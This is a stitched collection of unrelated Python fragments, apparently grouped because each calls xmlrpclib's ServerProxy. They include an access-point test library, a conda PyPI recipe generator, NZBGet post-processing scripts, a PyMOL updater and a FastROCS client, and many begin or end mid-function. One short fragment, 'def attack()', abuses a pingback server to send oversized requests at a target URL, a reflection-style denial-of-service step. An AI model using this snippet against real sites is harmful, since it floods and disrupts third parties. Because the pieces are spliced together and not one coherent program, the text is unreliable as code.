self.__options['t'] + ' '.join(br)) def supported_rates(self, *sr): """"Used to set supported rates for AP Example: ---- | supported rates | 10 | 20 | 55 | 110 | ---- Values to the keyword can be a list """ self.stream_edit(self.__options['u'] + '.*', self.__options['u'] + ' '.join(sr)) def wpa_pairwise(self, *w_pair): """Used to specify the WPA encryption protocol Example: ---- | wpa pairwise | CCMP | | | wpa pairwise | TKIP | CCMP | ---- """ self.stream_edit(self.__options['y'] + '.*', self.__options['y'] + ' '.join(w_pair)) def rsn_pairwise(self, r_pair): """Used to specify the RSN encryption protocol Example: ---- | rsn pairwise | CCMP | ---- """ self.stream_edit(self.__options['z'] + '.*', self.__options['z'] + r_pair) def wep_default_key(self, w_def=0): """Used to select the default key for WEP encryption Example: ---- | wep default key | 3 | ---- Default key will be `key 0` """ self.stream_edit(self.__options['wep_def'] + '.*', self.__options['wep_def'] + str(w_def)) def wep_key(self, key, key_no=0): """Used to set WEP keys Can set from 0 - 3 wep keys Example: ---- | wep key | 3CB2AB7CDE | 0 | | wep key | FDABE42844 | 1 | ---- By default, key number will be 0 """ if key_no == '0': self.stream_edit(self.__options['key'] + str(key_no) + '.*', self.__options['key'] + str(key_no) + '=' + key) if key_no == '1': self.stream_edit(self.__options['key'] + str(key_no) + '.*', self.__options['key'] + str(key_no) + '=' + key) if key_no == '2': self.stream_edit(self.__options['key'] + str(key_no) + '.*', self.__options['key'] + str(key_no) + '=' + key) if key_no == '3': self.stream_edit(self.__options['key'] + str(key_no) + '.*', self.__options['key'] + str(key_no) + '=' + key) self.delete(self.__options['k'] + '.*') self.delete(self.__options['w'] + '.*') self.delete(self.__options['y'] + '.*') self.delete(self.__options['z'] + '.*') self.delete(self.__options['wpa'] + '.*') self.delete(self.__options['x'] + '.*') self.delete(self.__options['asa'] + '.*') self.delete(self.__options['asp'] + '.*') self.delete(self.__options['ass'] + '.*') self.delete(self.__options['msg'] + '.*') def serve_ap(self, status): """Used to enable and disable the AP Example: ---- | AP | start | #Starts the AP | | AP | stop | #Stops the AP | ---- The Values to the keyword are case sensitive """ filename = path.join(self.getpath(), self.name) with open(filename, 'r') as conf: data = conf.readlines() hotspot = 'True' iface = '' self.proxy.board(status, data, hotspot, iface) def is_connected(self, sta_mac=''): """Used to verify whether the station and AP are connected """ c_mac = self.proxy.verify_connection() if sta_mac in c_mac: pass else: raise Exception("Station is not connected") def run_command(self, cmd): """Used to run the command in remote machine and returns the result """ return self.proxy.run_cmd(cmd) def reset_conf(self, default=False): """Used to reset the AP configuration to None or generate a default AP configuration for new users. Example: ---- | reset conf | | #resets the configuration to None | | reset conf | default=True | #generates default configuration | ---- """ default = bool(default) if not default: self.delete() if default: self.delete() self.wpa_passphrase('12345678') self.interface('wlan0') self.driver('nl80211') self.ap_ssid('AccessPoint') self.channel(1) self.mode('g') self.wpa_key_mgmt('WPA2-PSK') self.wpa_pairwise('CCMP') self.rsn_pairwise('CCMP')
def main(args, parser): if len(args.packages) > 1 and args.download: # Because if a package's setup.py imports setuptools, it will make all # future packages look like they depend on distribute. Also, who knows # what kind of monkeypatching the setup.pys out there could be doing. print("WARNING: building more than one recipe at once without " "--no-download is not recommended") proxies = get_proxy_servers() if proxies: transport = RequestsTransport() else: transport = None client = ServerProxy(args.pypi_url, transport=transport) package_dicts = {} [output_dir] = args.output_dir indent = '\n - ' all_packages = client.list_packages() all_packages_lower = [i.lower() for i in all_packages] while args.packages: package = args.packages.pop() dir_path = join(output_dir, package.lower()) if exists(dir_path): raise RuntimeError("directory already exists: %s" % dir_path) d = package_dicts.setdefault( package, { 'packagename': package.lower(), 'run_depends': '', 'build_depends': '', 'entry_points': '', 'build_comment': '# ', 'test_commands': '', 'usemd5': '', 'entry_comment': '#', 'egg_comment': '#' }) d['import_tests'] = valid(package).lower() if d['import_tests'] == '': d['import_comment'] = '# ' else: d['import_comment'] = '' d['import_tests'] = indent + d['import_tests'] if args.version: [version] = args.version versions = client.package_releases(package, True) if version not in versions: sys.exit("Error: Version %s of %s is not available on PyPI." % (version, package)) d['version'] = version else: versions = client.package_releases(package) if not versions: # The xmlrpc interface is case sensitive, but the index itself # is apparently not (the last time I checked, # len(set(all_packages_lower)) == len(set(all_packages))) if package.lower() in all_packages_lower: print("%s not found, trying %s" % (package, package.capitalize())) args.packages.append(all_packages[all_packages_lower.index( package.lower())]) del package_dicts[package] continue sys.exit("Error: Could not find any versions of package %s" % package) if len(versions) > 1: print("Warning, the following versions were found for %s" % package) for ver in versions: print(ver) print("Using %s" % versions[0]) print("Use --version to specify a different version.") d['version'] = versions[0] data = client.release_data(package, d['version']) urls = client.release_urls(package, d['version']) if not args.all_urls: # Try to find source urls urls = [url for url in urls if url['python_version'] == 'source'] if not urls: if 'download_url' in data: urls = [defaultdict(str, {'url': data['download_url']})] urls[0]['filename'] = urls[0]['url'].split('/')[-1] d['usemd5'] = '#' else: sys.exit("Error: No source urls found for %s" % package) if len(urls) > 1 and not args.noprompt: print("More than one source version is available for %s:" % package) for i, url in enumerate(urls): print("%d: %s (%s) %s" % (i, url['url'], human_bytes( url['size']), url['comment_text'])) n = int(input("Which version should I use? ")) else: n = 0 print("Using url %s (%s) for %s." % (urls[n]['url'], urls[n]['size'], package)) d['pypiurl'] = urls[n]['url'] d['md5'] = urls[n]['md5_digest'] d['filename'] = urls[n]['filename'] d['homeurl'] = data['home_page'] d['summary'] = repr(data['summary']) license_classifier = "License :: OSI Approved ::" if 'classifiers' in data: licenses = [ classifier.split(license_classifier, 1)[1] for classifier in data['classifiers'] if classifier.startswith(license_classifier) ] else: licenses = [] if not licenses: if data['license']: if args.noprompt: license = data['license'] elif '\n' not in data['license']: print('Using "%s" for the license' % data['license']) license = data['license'] else: # Some projects put the whole license text in this field print("This is the license for %s" % package) print() print(data['license']) print() license = input("What license string should I use? ") else: if args.noprompt: license = "UNKNOWN" else: license = input( ("No license could be found for %s on " + "PyPI. What license should I use? ") % package) else: license = ' or '.join(licenses) d['license'] = license # Unfortunately, two important pieces of metadata are only stored in # the package itself: the dependencies, and the entry points (if the # package uses distribute). Our strategy is to download the package # and "fake" distribute/setuptools's setup() function to get this # information from setup.py. If this sounds evil, keep in mind that # distribute itself already works by monkeypatching distutils. if args.download: import yaml print("Downloading %s (use --no-download to skip this step)" % package) tempdir = mkdtemp('conda_skeleton_' + package) if not isdir(SRC_CACHE): makedirs(SRC_CACHE) try: # Download it to the build source cache. That way, you have # it. download_path = join(SRC_CACHE, d['filename']) if not isfile(download_path) or hashsum_file( download_path, 'md5') != d['md5']: download(d['pypiurl'], join(SRC_CACHE, d['filename'])) else: print("Using cached download") print("Unpacking %s..." % package) unpack(join(SRC_CACHE, d['filename']), tempdir) print("done") print("working in %s" % tempdir) src_dir = get_dir(tempdir) run_setuppy(src_dir, tempdir, args) with open(join(tempdir, 'pkginfo.yaml'), encoding='utf-8') as fn: pkginfo = yaml.load(fn) setuptools_build = pkginfo['setuptools'] setuptools_run = False # Look at the entry_points and construct console_script and # gui_scripts entry_points for conda entry_points = pkginfo['entry_points'] if entry_points: if isinstance(entry_points, str): # makes sure it is left-shifted newstr = "\n".join(x.strip() for x in entry_points.split('\n')) config = configparser.ConfigParser() entry_points = {} try: config.readfp(StringIO(newstr)) except Exception as err: print("WARNING: entry-points not understood: ", err) print("The string was", newstr) entry_points = pkginfo['entry_points'] else: setuptools_run = True for section in config.sections(): if section in [ 'console_scripts', 'gui_scripts' ]: value = [ '%s=%s' % (option, config.get(section, option)) for option in config.options(section) ] entry_points[section] = value if not isinstance(entry_points, dict): print( "WARNING: Could not add entry points. They were:") print(entry_points) else: cs = entry_points.get('console_scripts', []) gs = entry_points.get('gui_scripts', []) # We have *other* kinds of entry-points so we need # setuptools at run-time if not cs and not gs and len(entry_points) > 1: setuptools_build = True setuptools_run = True entry_list = ( cs # TODO: Use pythonw for these + gs) if len(cs + gs) != 0: d['entry_points'] = indent.join([''] + entry_list) d['entry_comment'] = '' d['build_comment'] = '' d['test_commands'] = indent.join( [''] + make_entry_tests(entry_list)) if pkginfo[ 'install_requires'] or setuptools_build or setuptools_run: if isinstance(pkginfo['install_requires'], string_types): pkginfo['install_requires'] = [ pkginfo['install_requires'] ] deps = [] for dep in pkginfo['install_requires']: spec = spec_from_line(dep) if spec is None: sys.exit("Error: Could not parse: %s" % dep) deps.append(spec) if 'setuptools' in deps: setuptools_build = False setuptools_run = False d['egg_comment'] = '' d['build_comment'] = '' d['build_depends'] = indent.join([''] + ['setuptools'] * setuptools_build + deps) d['run_depends'] = indent.join([''] + ['setuptools'] * setuptools_run + deps) if args.recursive: for dep in deps: dep = dep.split()[0] if not exists(join(output_dir, dep)): args.packages.append(dep) if pkginfo['packages']: deps = set(pkginfo['packages']) if d['import_tests']: olddeps = [ x for x in d['import_tests'].split() if x != '-' ] deps = set(olddeps) | deps d['import_tests'] = indent.join([''] + sorted(deps)) d['import_comment'] = '' finally: rm_rf(tempdir) for package in package_dicts: d = package_dicts[package] makedirs(join(output_dir, package.lower())) print("Writing recipe for %s" % package.lower()) with open(join(output_dir, package.lower(), 'meta.yaml'), 'w', encoding='utf-8') as f: f.write(PYPI_META.format(**d)) with open(join(output_dir, package.lower(), 'build.sh'), 'w', encoding='utf-8') as f: f.write(PYPI_BUILD_SH.format(**d)) with open(join(output_dir, package.lower(), 'bld.bat'), 'w', encoding='utf-8') as f: f.write(PYPI_BLD_BAT.format(**d)) print("Done")
def attack(): server = ServerProxy(pingbackURL) try: server.pingback.ping(hugeFile % randint(10, 1000), targetURL) except: pass
import sys import time from xmlrpclib import ServerProxy from pprint import pprint client = ServerProxy("http://217.116.6.26:8002/") client = ServerProxy("http://127.0.0.1:8002/") # INFO print 'Method info()' re = client.info() assert re != None print '\tInfo:', re # PING print '\nMethod ping()' for i in range(4): begin = time.time() print "\tPinging server.. ", re = client.ping() print "%.3f secs" % (time.time() - begin) time.sleep(1) # SEARCH print '\nMethod search()' search = {'creator_id': 1} # search by dictionary re = client.search(search) assert type(re) == list print '\tSearch results:', re
def __init__(self, email, apikey='', password=''): self.apikey = apikey self.password = password self.email = sanitize_email(email) self.email_hash = md5_hash(self.email) self._server = ServerProxy(self.API_URI.format(self.email_hash))
if not os.environ.get('NZBPO_NZB_DIR'): print "[ERROR] Fehler bei der angabe des NZB_DIR.... Bitte ueberpruefen" sys.exit(POSTPROCESS_ERROR) if not os.path.isdir(os.environ.get('NZBPO_NZB_DIR')): print "[ERROR] Der angegebene Pfad is kein Verzeichnis... Bitte ueberprufen!" sys.exit(POSTPROCESS_ERROR) # Logger um das Passwort fest zu stellen!! host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (username, password, host, port) server = ServerProxy(rpcUrl) postqueue = server.postqueue(10000) log = postqueue[0]['Log'] print "[INFO] Messages von der NZB Datei werden eingelesen und verarbeitet." print "[INFO] Passwortliste wird eingelesen und verarbeitet." if len(log) > 0: for entry in log: log_content = ((u'%s\n' % (entry['Text'])).encode('utf8')) # Eilesen der Passwortlist welche in NZBGet hinterlegt wurde als Pfad angabe with open(os.environ['NZBOP_UNPACKPASSFILE'], "r") as passwort_liste: for liste1 in passwort_liste: liste = (liste1.rstrip()) if liste in log_content: passwort_liste.close()
def setUpClass(cls): cls.server = ServerProxy("http://" + HOSTNAME + ":" + str(TEST_PORT), allow_none=True) cls.auth_data = Authentication.read_auth_data(AUTH_FILE)
def update_pymol(self, indices): rpc_port = 9123 if indices: frames = [] for indice in indices: i, j = self.id_to_H_frame[indice] frames = np.concatenate( (frames, np.trim_zeros(self.H_frame[i, j], "b"))) nb_frames = frames.shape[0] if nb_frames > self.max_frame: print( "Too much frames (%s). So we choose %s structures randomly." % (nb_frames, self.max_frame)) frames = random.sample(frames, self.max_frame) try: pymol = ServerProxy(uri="http://localhost:%s/RPC2" % rpc_port) pymol.do("delete s*") for frame in frames: frame = np.int(frame) # Go to the frame self.u.trajectory[frame] # Write the PDB file self.u.atoms.write("structure.pdb") try: pymol.load("%s/structure.pdb" % os.getcwd()) except: print("Can\"t load PDB structure !") pass if self.cartoon: pymol.show("cartoon") else: pymol.show("ribbon") pymol.hide("lines") pymol.do("copy s%s, structure" % frame) pymol.delete("structure") pymol.do("show sticks, organic") if np.int(frames[0]) != frame and nb_frames > 1: pymol.do("align s%d, s%d" % (frame, frames[0])) pymol.do("center s%s" % frame) except: print("Connection issue with PyMol! (Cmd: pymol -R)")
# -*- coding: utf-8 -*- """ Created on Fri Mar 31 09:10:14 2017 @author: ros """ from xmlrpclib import ServerProxy s=ServerProxy('http://ubuntu:5678/') caller_id='/turtlesim' topic='/turtle1/cmd_vel' protocols=[['TCPROS']] s.requestTopic(caller_id, topic, protocols)
# First we need to know connection info: host, port and password of NZBGet server. # NZBGet passes all configuration options to post-processing script as # environment variables. host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] if host == '0.0.0.0': host = '127.0.0.1' # Build a URL for XML-RPC requests rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (quote(username), quote(password), host, port) # Create remote server object server = ServerProxy(rpcUrl) # Call remote method 'loadlog' nzbid = int(os.environ['NZBPP_NZBID']) log = server.loadlog(nzbid, 0, 10000) # Now iterate through entries and save them to the output file if len(log) > 0: f = open('%s/_nzblog.txt' % os.environ['NZBPP_DIRECTORY'], 'wb') for entry in log: f.write( (u'%s\t%s\t%s\n' % (entry['Kind'], datetime.datetime.fromtimestamp(int( entry['Time'])), entry['Text'])).encode('utf8')) f.close()
def testXmlRpc(self): scheme = 'http' try: scheme = self.harness.scheme except AttributeError: pass if scheme == 'https': url = 'https://%s:%s/xmlrpc/' % (self.interface(), self.PORT) proxy = ServerProxy(url, transport=HTTPSTransport()) else: url = 'http://%s:%s/xmlrpc/' % (self.interface(), self.PORT) proxy = ServerProxy(url) self.getPage('/xmlrpc/foo') self.assertBody('Hello world!') self.assertEqual(proxy.return_single_item_list(), [42]) self.assertNotEqual(proxy.return_single_item_list(), 'one bazillion') self.assertEqual(proxy.return_string(), 'here is a string') self.assertEqual(proxy.return_tuple(), list( ('here', 'is', 1, 'tuple'))) self.assertEqual(proxy.return_dict(), {'a': 1, 'c': 3, 'b': 2}) self.assertEqual(proxy.return_composite(), [{ 'a': 1, 'z': 26 }, 'hi', ['welcome', 'friend']]) self.assertEqual(proxy.return_int(), 42) self.assertEqual(proxy.return_float(), 3.14) self.assertEqual(proxy.return_datetime(), DateTime((2003, 10, 7, 8, 1, 0, 1, 280, -1))) self.assertEqual(proxy.return_boolean(), True) self.assertEqual(proxy.test_argument_passing(22), 44) try: proxy.test_argument_passing({}) except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual( x.faultString, "unsupported operand type(s) for *: 'dict' and 'int'") else: self.fail('Expected xmlrpclib.Fault') try: proxy.non_method() except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual(x.faultString, 'method "non_method" is not supported') else: self.fail('Expected xmlrpclib.Fault') try: proxy.test_returning_Fault() except Exception: x = sys.exc_info()[1] self.assertEqual(x.__class__, Fault) self.assertEqual(x.faultString, 'custom Fault response') else: self.fail('Expected xmlrpclib.Fault')
def __init__(self, url): self.url = url self.proxy = ServerProxy(url, allow_none=1)
# For more info visit http://nzbget.net/RPC_API_reference # First we need to know connection info: host, port and password of NZBGet server. # NZBGet passes all configuration options to post-processing script as # environment variables. host = os.environ['NZBOP_CONTROLIP'] port = os.environ['NZBOP_CONTROLPORT'] username = os.environ['NZBOP_CONTROLUSERNAME'] password = os.environ['NZBOP_CONTROLPASSWORD'] if host == '0.0.0.0': host = '127.0.0.1' # Build an URL for XML-RPC requests rpcUrl = 'http://%s:%s@%s:%s/xmlrpc' % (username, password, host, port) # Create remote server object server = ServerProxy(rpcUrl) if os.environ.get('NZBPO_STATISTICS') == 'yes': # Find correct nzb in method listgroups groups = server.listgroups(0) nzbID = int(os.environ['NZBPP_NZBID']) for nzbGroup in groups: if nzbGroup['NZBID'] == nzbID: break text += '\n\nStatistics:' # add download size DownloadedSize = float(nzbGroup['DownloadedSizeMB']) unit = ' MB' if DownloadedSize > 1024:
def main(self): globalErrorUtility.configure('codeimportdispatcher') dispatcher = CodeImportDispatcher(self.logger, self.options.max_jobs) dispatcher.findAndDispatchJobs( ServerProxy(config.codeimportdispatcher.codeimportscheduler_url))
def main(argv=[__name__]): parser = argparse.ArgumentParser() # positional arguments retaining backward compatibility parser.add_argument( 'server:port', help= 'Server name and port number of database to search i.e. localhost:8080.' ) parser.add_argument( 'query', help= 'File containing the query molecule to search (format not restricted to *.oeb).' ) parser.add_argument( 'results', help='Output file to store results (format not restricted to *.oeb).') parser.add_argument('nHits', nargs='?', type=int, default=100, help='Number of hits to return (default=100).') parser.add_argument( '--tversky', action='store_true', default=argparse.SUPPRESS, help='Switch to Tversky similarity scoring (default=Tanimoto).') parser.add_argument('--shapeOnly', action='store_true', default=argparse.SUPPRESS, help='Switch to shape-only scores (default=Combo).') parser.add_argument( '--alternativeStarts', default=argparse.SUPPRESS, nargs=1, dest='altStarts', choices=('random', 'subrocs', 'inertialAtHeavyAtoms', 'inertialAtColorAtoms'), help='Optimize using alternative starts (default=inertial). ' 'To perform N random starts do "--alternativeStarts random N" (default N=10)' ) known, remaining = (parser.parse_known_args()) dargs = vars(known) qfname = dargs.pop('query') numHits = dargs.pop('nHits') startType = dargs.get('altStarts', None) if startType: dargs['altStarts'] = str(startType[0]) if len(remaining) == 1 and dargs['altStarts'] == 'random': try: numRands = int(remaining[0]) dargs['randStarts'] = numRands except ValueError: print( "Invalid argument given. See --help menu for argument list" ) sys.exit() if len(remaining) > 1: print( "Too many arguments given. See --help menu for argument list") sys.exit() else: if remaining: print( "Too many arguments given. See --help menu for argument list") sys.exit() try: fh = open(qfname, 'rb') except IOError: sys.stderr.write("Unable to open '%s' for reading" % qfname) return 1 iformat = GetFormatExtension(qfname) ofname = dargs.pop('results') oformat = GetFormatExtension(ofname) s = ServerProxy("http://" + dargs.pop('server:port')) data = Binary(fh.read()) try: idx = s.SubmitQuery(data, numHits, iformat, oformat, dargs) except Fault as e: if "TypeError" in e.faultString: # we're trying to run against an older server, may be able # to still work if the formats ameniable. if ((iformat == ".oeb" or iformat == ".sq") and oformat == ".oeb"): idx = s.SubmitQuery(data, numHits) else: sys.stderr.write( "%s is too new of a version to work with the server %s\n" % (argv[0], argv[1])) sys.stderr.write( "Please upgrade your server to FastROCS version 1.4.0 or later to be able to use this client\n" ) sys.stderr.write( "This client will work with this version of the server if the input file is either" "'.oeb' or '.sq' and the output file is '.oeb'\n") return 1 else: sys.stderr.write(str(e)) return 1 first = False while True: blocking = True try: current, total = s.QueryStatus(idx, blocking) except Fault as e: print(str(e), file=sys.stderr) return 1 if total == 0: continue if first: print("%s/%s" % ("current", "total")) first = False print("%i/%i" % (current, total)) if total <= current: break results = s.QueryResults(idx) # assuming the results come back as a string in the requested format with open(ofname, 'wb') as output: output.write(results.data) return 0
def __init__(self, url): self.analyzer = ServerProxy(url, encoding='utf-8')
def run(self): ''' Run the client and perform all the operations: * Connect to the server. * Receive video while sniffing packets. * Close connection. * Process data and extract information. * Run measures. :returns: A dictionary of video files received (see :attr:`VideoTester.gstreamer.RTSPClient.files`), a dictionary of caps (see :attr:`VideoTester.gstreamer.RTSPClient.caps`) and a list of results :rtype: list ''' VTLOG.info('Client running!') try: tempdir, num = self.__get_tempdir() server = ServerProxy('http://%s:%s' % (self.conf['ip'], self.port)) rtspport = server.run(self.conf['bitrate'], self.conf['framerate']) except Exception as e: VTLOG.error(e) return None VTLOG.info('Connected to XMLRPC Server at %s:%s' % (self.conf['ip'], self.port)) VTLOG.info( 'Evaluating: %s, %s, %s kbps, %s fps, %s' % (self.conf['video'], self.conf['codec'], self.conf['bitrate'], self.conf['framerate'], self.conf['protocol'])) sniffer = Sniffer(self.conf['iface'], self.conf['ip'], '%s%s.cap' % (tempdir, num)) rtspclient = RTSPClient(tempdir + num, self.conf['codec'], self.conf['bitrate'], self.conf['framerate']) url = 'rtsp://%s:%s/%s.%s' % (self.conf['ip'], rtspport, self.conf['video'], self.conf['codec']) child = Process(target=sniffer.run) ret = True try: child.start() VTLOG.info('PID: %s | Sniffer started' % child.pid) time.sleep(1) rtspclient.receive(url, self.conf['protocol']) except KeyboardInterrupt: VTLOG.warning('Keyboard interrupt!') except Exception as e: VTLOG.error(e) else: ret = False server.stop(self.conf['bitrate'], self.conf['framerate']) child.terminate() child.join() VTLOG.info('PID: %s | Sniffer stopped' % child.pid) if ret: return None video = '/'.join([self.path, dict(self.videos)[self.conf['video']]]) rtspclient.makeReference(video) conf = { 'codec': self.conf['codec'], 'bitrate': self.conf['bitrate'], 'framerate': self.conf['framerate'], 'caps': rtspclient.caps } packetdata = sniffer.parsePkts(self.conf['protocol'], rtspclient.caps) codecdata, rawdata = self.__parseVideo(rtspclient.files, rtspclient.caps, self.conf['codec']) results = [] results.extend(QoSmeter(self.conf['qos'], packetdata).run()) results.extend(BSmeter(self.conf['bs'], codecdata).run()) results.extend( VQmeter(self.conf['vq'], (conf, rawdata, codecdata, packetdata)).run()) VTLOG.info('Saving measures...') for measure in results: f = open(tempdir + num + '_' + measure['name'] + '.pkl', 'wb') pickle.dump(measure, f) f.close() VTLOG.info('Client stopped!') return rtspclient.files, rtspclient.caps, results
class Client(wx.App): def __init__(self, url, dirname, urlfile): self.secret = randomString(SECRET_LENGTH) n = ListableNode(url,dirname, self.secret) t = Thread(target=n._start) t.setDaemon(1) t.start() sleep(HEAD_START) self.server = ServerProxy(url) super(Client, self).__init__() def updateList(self): self.files.Set(self.server.list()) def updateRemoteList(self, remote_url): #print self.server self.remotefiles.Set(self.server.remoteList(remote_url)) def OnInit(self): win = wx.Frame(None, title="File Share Tool",size=(800,600)) bkg = wx.Panel(win) self.urlinput = urlinput = wx.TextCtrl(bkg, -1, 'code the remote ip here', size = (200,25)) self.statusBar = win.CreateStatusBar() url_text = wx.StaticText(bkg, -1, 'remote URL:', size=(1, 25)) self.localip_text = localip_text = wx.StaticText(bkg, -1, 'Local IP:%s' % getLocalIp(),size=(200,20)) submit = wx.Button(bkg, label="Fetch",size=(80,25)) submit.Bind(wx.EVT_BUTTON, self.getRemoteResource) hbox = wx.BoxSizer() hbox.Add(localip_text, proportion=1, flag=wx.ALL, border = 10) hbox.Add(url_text, proportion=1,flag=wx.ALL, border=10) hbox.Add(urlinput, proportion=1,flag=wx.ALL | wx.ALIGN_RIGHT, border=10) hbox.Add(submit, flag=wx.TOP | wx.BOTTOM | wx.RIGHT, border=10) self.files = files = wx.ListBox(bkg,size=(350,400)) self.remotefiles = remotefiles = wx.ListBox(bkg,size=(350,400)) self.remotefiles.Bind(wx.EVT_LISTBOX_DCLICK, self.listDClick) vbox = wx.BoxSizer(wx.VERTICAL) vbox.Add(hbox, proportion=0, flag=wx.EXPAND) hbox2 = wx.BoxSizer() hbox2.Add(remotefiles,proportion=1, flag=wx.ALL | wx.EXPAND, border=10) hbox2.Add(files, proportion=1,flag=wx.ALL | wx.EXPAND, border=10) vbox.Add(hbox2,proportion=0, flag=wx.EXPAND) hbox3 = wx.BoxSizer() link = wx.lib.hyperlink.HyperLinkCtrl(parent = bkg, pos = (225, 60)) link.SetURL(URL = "http://www.the5fire.net") link.SetLabel(label = u"访问作者博客") link.SetToolTipString(tip = "the5fire") hbox3.Add(link, proportion = 0, flag = wx.EXPAND | wx.TOP, border = 10) vbox.Add(hbox3, proportion = 0, flag = wx.EXPAND) bkg.SetSizer(vbox) win.Show() self.updateList() return True def getRemoteResource(self, event): query_url = 'http://%s:4242' % self.urlinput.GetValue() if query_url == '': sefl.statusBar.SetStatusText('query url can not be null!') return self.server.hello(query_url) self.updateRemoteList(query_url) def listDClick(self, event): #print 'on click' query = self.remotefiles.GetString(self.remotefiles.GetSelection()) self.fetchHandler(query) def fetchHandler(self, query): #query =self.input.GetValue() #query_url = self.urlinput.GetValue() if query == '': self.statusBar.SetStatusText('query string can not be null!') return #if query_url != '': # self.server.hello(query_url.strip()) try: self.server.fetch(query, self.secret) self.statusBar.SetStatusText('download the file %s successed!' % query) self.updateList() except Fault,f: if f.faultCode != UNHANDLED: raise self.statusBar.SetStatusText("Counldn't find the file %s" % query)
# We need to create the temp environment print "Creating temporary environment..." env = setup_environment() print "Done. Sleeping to give the server time time to wake up..." cleanup = fork_start_server() print "Server set up!" uri = "http://127.1:8000/example_namespace/" ### # If you are reading this code to learn how to use PyOLS, # this is where you should start. ### print print "Client connecting to %s..." % (uri) from xmlrpclib import ServerProxy s = ServerProxy(uri) print "Connected. Importing 'doc/beer.owl'..." s.importOWL(file('doc/beer.owl').read()) print print "Some keywords in the ontology:" for (id, kwd) in enumerate(s.queryKeywords()): if id > 10: break print kwd['name'] + ':' if not kwd['left_relations']: print ' ' + '<no outbound relationships>' for rel in kwd['left_relations']: print ' ' + rel['relation']['name'], rel['right']['name']
class MonitorscoutPlugin(object): plugin_name = 'MonitorscoutPlugin' def __init__(self, config, logging, **kw): self.l = logging self.config = config alert = kw.get('alert') self.headers = { 'X-Auth-API-Key': config.get(self.plugin_name, 'api_key'), 'X-Requested-With': 'vRealize Alerts API', 'Content-Type': 'application/json', } self.create_url = '{url}/{device}/create_alert'.format( url=config.get(self.plugin_name, 'api_url'), device=config.get(self.plugin_name, 'device_id')) self.close_url = '{url}/{device}/close_alert'.format( url=config.get(self.plugin_name, 'api_url'), device=config.get(self.plugin_name, 'device_id')) alert_name = '{resourceName} {status}'.format( resourceName=alert.resourceName, status=alert.status) alert_msg = '{startDate}: \n{info}'.format(startDate=alert.startDate, info=alert.info) self.alert_data = {'name': alert_name, 'error_msg': alert_msg} self.alert = alert # Connect to MS RPC API if config.has_option('MonitorscoutPlugin', 'rpc_api_url'): api_url = config.get('MonitorscoutPlugin', 'rpc_api_url') api_username = config.get('MonitorscoutPlugin', 'rpc_api_username') api_password = config.get('MonitorscoutPlugin', 'rpc_api_password') if config.has_option('MonitorscoutPlugin', 'rpc_api_account'): api_account = config.get('MonitorscoutPlugin', 'rpc_api_account') else: api_account = None self.ms = ServerProxy(api_url) self.ms_sid = self.ms.login(api_username, api_password, api_account) def run(self): config = self.config log = self.l # Close any ACTIVE device alerts that have been created with the # same resourceName in MS. if self.alert.status == 'CANCELED': try: self.close_device_alert() except Exception as e: log.exception('Exception while trying to close device alert') # Continue anyways because it might mean MS RPC API is # unconfigured. pass else: r = self.make_device_alert() if r.status_code == 200: log.info('Created device alert successfully') else: log.error( 'Error creating device alert: {text}'.format(text=r.text)) def make_device_alert(self): return requests.put(self.create_url, headers=self.headers, data=json.dumps(self.alert_data)) def close_device_alert(self): device_alerts = self.ms.device.get_alerts( self.ms_sid, self.config.get('MonitorscoutPlugin', 'device_id')) for entity_id, entity in device_alerts.get('entity_data').items(): if entity.get('type', '') != 'device_alert': continue log = self.l alert_name = '{resourceName} ACTIVE'.format( resourceName=self.alert.resourceName) alert_data = {'name': alert_name} if entity.get('name', '') == alert_name: res = requests.put(self.close_url, headers=self.headers, data=json.dumps(alert_data)) if res.status_code == 200: log.info('Closed device alert {id} successfully'.format( id=entity.get('id', ''))) else: log.error('Error closing device alert {id}: {text}'.format( id=entity.get('id', ''), text=res.text))
#Job is complete, retrieve results job_output_path = os.path.join(job_output_drop, job_id + '.ase') retrieve_cmd = "copy %s %s" % (job_output_path, target_intermediate_file) print "Launching %s" % retrieve_cmd ret = os.system(retrieve_cmd) #ideally the copy sets the proper name on the target intermediate file return if __name__ == "__main__": test_input_file = '..\\test_data\\max\\box.max' test_output_file = '..\\box.ase' jobserverproxy = ServerProxy("http://localhost:8000") max2ase([test_output_file], [test_input_file], None) # server = ServerProxy("http://localhost:8000") # local server """ job_id = proxy.setup_job('max','ase') print job_id status = proxy.query_job_status(job_id) status_str = get_status_string(status) print "Status: %s" % (status_str) #Start the job proxy.start_job(job_id) #Check the status again #status = proxy.query_job_status(job_id) status = proxy.query_job_status(job_id) status_str = get_status_string(status)
#!/usr/bin/python2 from xmlrpclib import ServerProxy import datetime s = ServerProxy('http://localhost:8080') print s.testFunc('abc') print s.testFunc(1) print s.testFunc(True) print s.testFunc(0.5) print s.testFunc(datetime.datetime.now()) print s.testFunc({'a':1, 'b':2, 'c':3})
def start_server(self): """Start the remote server. Returns ------- ServerProxy Instance of the proxy, if the connection was successful. Raises ------ RPCServerError If the server providing the requested service cannot be reached after 100 contact attempts (*pings*). The number of attempts is set by :attr:`Proxy.max_conn_attempts`. Examples -------- >>> p = Proxy() # doctest: +SKIP >>> p.stop_server() # doctest: +SKIP >>> p.start_server() # doctest: +SKIP """ env = compas._os.prepare_environment() # this part starts the server side of the RPC setup # it basically launches a subprocess # to start the default service # the default service creates a server # and registers a dispatcher for custom functionality try: Popen except NameError: self._process = Process() for name in env: if self._process.StartInfo.EnvironmentVariables.ContainsKey( name): self._process.StartInfo.EnvironmentVariables[name] = env[ name] else: self._process.StartInfo.EnvironmentVariables.Add( name, env[name]) self._process.StartInfo.UseShellExecute = False self._process.StartInfo.RedirectStandardOutput = self.capture_output self._process.StartInfo.RedirectStandardError = self.capture_output self._process.StartInfo.FileName = self.python self._process.StartInfo.Arguments = '-m {0} --port {1} --{2}autoreload'.format( self.service, self._port, '' if self.autoreload else 'no-') self._process.Start() else: args = [ self.python, '-m', self.service, '--port', str(self._port), '--{}autoreload'.format('' if self.autoreload else 'no-') ] kwargs = dict(env=env) if self.capture_output: 